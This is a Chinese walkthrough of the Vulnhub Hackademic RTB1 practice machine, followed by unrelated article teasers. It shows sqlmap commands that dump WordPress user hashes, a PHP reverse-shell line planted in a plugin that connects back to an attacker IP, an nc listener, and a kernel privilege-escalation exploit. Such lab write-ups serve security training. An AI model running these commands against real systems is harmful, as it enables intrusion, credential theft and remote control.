Vulnhub系列靶机--- Hackadmeic.RTB1

系列:Hackademic(此系列共2台)
难度:初级

信息收集

主机发现

netdiscover -r 192.168.80.0/24

image-20230819150242058

端口扫描

nmap -A -p- 192.168.80.143

image-20230819151707785

访问80端口

image-20230819151453856

使用指纹识别插件查看是WordPress

image-20230819151946799

根据首页显示的内容,点击target

image-20230819152040904

image-20230819152140328

点击 页面能点击的链接,发现点击Uncategorized的时候,链接变成了

http://192.168.80.143/Hackademic_RTB1/?cat=1

image-20230819152319809

尝试有无SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞

image-20230819152424365

目录扫描

单纯的爆破IP地址,扫描不出有用的目录信息

dirsearch -u http://192.168.80.143 -i 200   

image-20230819164419748

开始是直接扫了IP,现在多了一个目录/Hackademic_RTB1/,那么直接扫该目录

dirsearch -u http://192.168.80.143/Hackademic_RTB1/ -i 200

image-20230819164354082

漏洞利用

sqlmap

查看都有哪些数据库

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" --dbs --batch 

image-20230819152623542

获取所有表

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch

image-20230819152737643

获取该表的所有字段

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  --columns --batch 

image-20230819152939501

获取想要的数据

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  -C user_login,user_pass --dump

image-20230819153048717

登录后台192.168.80.143/Hackademic_RTB1/wp-admin/

image-20230819164537854

使用一个用户密码登录 NickJames密码:admin

image-20230819165028767

登上 之后没有什么能够 利用的,尝试换一个用户登录看看

用户:GeorgeMiller密码q1w2e3,发现在Plugins选项里有一个Plugin Editor编辑的地址,加入反弹shell

system("bash -c 'sh -i &>/dev/tcp/192.168.80.132/8989 0>&1'");

image-20230819184510299

kali开启监听

nc -lvvp 8989

提交之后就得要知道上文的 路径,找出路径才能触发反弹shell


找到提交路径方式一:


wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有你上传的图片,视频和附件。

WordPress文件夹内,你会发现大量的代码文件和3个文件夹**wp-admin wp-content wp-includes**

wp-admin 没错,这是你的仪表板你登陆wordpress后看到的界面,包括所有的后台文件

wp-content包含你所有的内容,包括插件 , 主题和您上传的内容

Plugins文件夹包含所有插件。 每个插件都有一个自己的文件夹。 如Aksimet坐在Akismet在文件夹内

同样,theme主题文件夹保存你所有的主题。 插件一样,每个主题有单独的文件夹。

Uploads文件夹,所有你上传图片,视频和附件。

languages是关于语言的

wp-includes包括持有的所有文件和库,是必要的WordPress管理,编辑和JavaScript库,CSS和图像fiels

在爆破目录的时候发现有一个wp-content目录,可以访问一下看看

image-20230819171036292

页面显示如下

http://192.168.80.143/Hackademic_RTB1/wp-content/

image-20230819171102568

刚在又是在Plugins选项里的Plugin Editor编辑的反弹shell,刚在Plugin Editor编辑页面也显示了说正在编辑hello.php

image-20230819184413751

所以在http://192.168.80.143/Hackademic_RTB1/wp-content/页面中点击plugins

image-20230819171841864

image-20230819171903184

就看到了hello.php,点击hello.php触发反弹shell (耐心等待-----------------)

image-20230819172020273

内核提权

查看内核版本

uname -a

image-20230819180019128

新开一个终端搜索该版本的漏洞

searchsploit 2.6.3 | grep "Local Privilege Escalation"

image-20230819180245056

查看完整路径

searchsploit -p linux/local/15285.c 

image-20230819180544957

把这个15285.c复制到apache服务的根路径/var/www/html

sudo cp  /usr/share/exploitdb/exploits/linux/local/15285.c  /var/www/html/15285.c

启动apache服务

systemctl restart apache2.service

image-20230819184303398

gcc 15285.c -o exp

# 将15285.c预处理、汇编、编译并链接形成可执行文件exp

#-o选项用来指定输出文件的文件名

15285.c预处理、汇编、编译并链接形成可执行文件exp

-o选项用来指定输出文件的文件名


image-20230819185040509

在这里插入图片描述

闯关成功!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/87054.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

TCP最大连接数问题总结

最大TCP连接数量限制有:可用端口号数量、文件描述符数量、线程、内存、CPU等。每个TCP连接都需要以下资源,如图所示: 1、可用端口号限制 Q:一台主机可以有多少端口号?端口号与TCP连接?是否能修改&#x…

RTP/RTCP的 NACK, PLI,SLI,FIR

1,概述 在网络环境不是太好的情况下,比如网络拥塞比较严重,丢包率可能比较高,简单实用NACK重传的机制,这样就会有大量的RTCP NACK报文,发送端收到相应的报文,又会发送大量指定的RTP报文&#x…

H.265视频无插件流媒体播放器EasyPlayer.js播放webrtc断流重连的异常修复

H5无插件流媒体播放器EasyPlayer属于一款高效、精炼、稳定且免费的流媒体播放器,可支持多种流媒体协议播放,可支持H.264与H.265编码格式,性能稳定、播放流畅,能支持WebSocket-FLV、HTTP-FLV,HLS(m3u8&#…

小说图文实现构想

1、当前小说盈利模式 当前大部分小说平台盈利模式主要依赖于小说IP的实现,如影视、动漫及书籍出版等,其中通过VIP等充值阅读方式从部分用户获取收入,当然由于盗版横行,通过VIP获取收益往往不是很理想想,广告收入在整个…

Django REST framework实现api接口

drf 是Django REST framework的简称,drf 是基于django的一个api 接口实现框架,REST是接口设计的一种风格。 一、 安装drf pip install djangorestframework pip install markdown # Markdown support for the browsable API. pip install …

Mongodb两种启动方法

一、命令行启动 1.修改存放数据库的位置 说明:E:\data\mongodb;我在E盘创建的文件夹mongodb mongod --dbpathE:\data\mongodb 2.成功启动 说明:默认端口27017,代表已经启动成功 ,并在mongodb自动创建文件 二、配置项…

JFrog Artifactory介绍

JFrog Artifactory 1. 简介2. 安装3. 使用说明3.1 界面展示3.2 仓库搭建流程(本地库)3.3 普通用户界面展示3.4 上传制品,可单传或多传3.5 下载制品3.6 支持搜索3.7 单个制品复制移动删除3.8 用户管理3.9 存储信息3.10 基本设置 4. 前期调研被…

什么是软件压力测试?软件压力测试工具和流程有哪些?

软件压力测试 一、含义:软件压力测试是一种测试应用程序性能的方法,通过模拟大量用户并发访问,测试应用程序在压力情况下的表现和响应能力。软件压力测试的目的是发现系统潜在的问题,如内存泄漏、线程锁、资源泄漏等,…

心理与神经生物工程交叉学科国际论坛—暨第17届复合医学工程国际会议(CME2023)

心理与神经生物工程交叉学科国际论坛—暨第17届复合医学工程国际会议(CME2023) International Forum on the Intersection of Psychology and Neuromedical Engineering -17th International Conference on Complex Medical Engineering (CME2023) 心…

IoT DC3 是一个基于 Spring Cloud 的开源的、分布式的物联网(IoT)平台本地部署步骤

dc3 windows 本地搭建步骤: ​​ 必要软件环境 进入原网页# 务必保证至少需要给 docker 分配:1 核 CPU 以及 4G 以上的运行内存! JDK : 推荐使用 Oracle JDK 1.8 或者 OpenJDK8,理论来说其他版本也行; Maven : 推荐…

solidity0.8.0的应用案例10:可升级合约

这个案例是代理合约的实际操作,代理合约实现了逻辑和数据的分离,就可以实现在生产环境中,轻松升级合约,这就是一个如何实际升级合约的案例。 实现一个简单的可升级合约,它包含3个合约:代理合约,…

聚观早报|2023戴尔科技峰会助力创新;小米汽车电池供应商敲定

【聚观365】8月23日消息 2023戴尔科技峰会助力企业创新 小米汽车电池供应商敲定中创新航和宁德时代 iPhone15预计有6种配色 王小川卸任自动驾驶企业禾多科技董事 特斯拉动力总成副总裁宣布离职 2023戴尔科技峰会助力企业创新 近日“新生万物 数实新格局 —— 2023戴尔科技…

记录protocol buffers Mac安装

使用brew安装最新的protobuf 在Mac 上安装,使用brew 可以安装最新的protobuf。这个也比较简单,简单说一下。 首先先检查一下是否安装了brew。如果没有安装brew的话,请先安装brew.可以通过brew --version来检查 使用brew install protobuf 来…

【Modbus通信实验三】数据切片问题

在做两个串口相互通信的实验中,当发送频率快一点时偶尔会遇到以下情景,即一次send中把原数据拆成两份发送,就会导致CRC校验错误。下图中6字节数据拆成42是把SetRThreshold()阈值设为2,当设为1的情况下则会拆成51。 一开始以为是缓…

流弊的docker

docker就是隔离式运行软件组(多个软件),docker分为dockerfile文件,images 镜像,容器,本地仓库,远程仓库。 ckerFile文件,可以获得images镜像 运行镜像获得容器 || 容器提交获得镜像…

二叉树---前,中,后序遍历做题技巧(前,中,后,层次,线索二叉树)

1.由二叉树求前,中,后序遍历 前序:根左右(每一个小方块都遵循) 得到:A,B,D,H,E,I,C,F,G 中序:左根右(每一个小方块都遵循) 得到:H,D,B,I,E,A,F,C,G 后序:左右…

QCC_BES 音频重采样算法实现

+V hezkz17进数字音频系统研究开发交流答疑群(课题组) 这段代码是一个用于将音频数据进行立体声重采样的函数。以下是对代码的解读: 函数接受以下参数: pcm_buf:16位有符号整型的音频缓冲区,存储了输入的音频数据。pcm_len:音频缓冲区的长度。mic1:16位有符号整型的音频…

本地生活服务平台加盟哪家公司好?

本地生活的竞争从年初的火热到现在,已经进入了下半场,随着优胜劣汰的筛选,那么直到现在,想做本地生活服务平台加盟,哪家公司比较好呢,应该如何选择呢? 首先我们得弄懂,我们加盟本地…

在线图片怎么转换成PDF?在线图片转换成PDF步骤介绍

文件格式要转化不知道怎么办?想要网上下载文件格式转换软件,但是却不知道下载哪个好?今天小编小编就给大家分享一下靠谱的小圆象PDF转换器工具,想知道这款软件好不好用?在线图片怎么转换成PDF?那就进来看看吧。 在线图片怎么转换成PDF 小圆象PDF转换…

科技资讯|荷兰电动自行车丢失将被拒保,苹果Find My可以减少丢失

荷兰最大的自行车协会荷兰皇家旅游俱乐部宣布,将不再为胖胎电动自行车提供保险,因为这种自行车的被盗风险极高。 随着电动自行车的销量飙升,胖胎也变得更受欢迎。但问题是,胖胎电动自行车也成为了自行车盗窃者的首选目标。ANWB …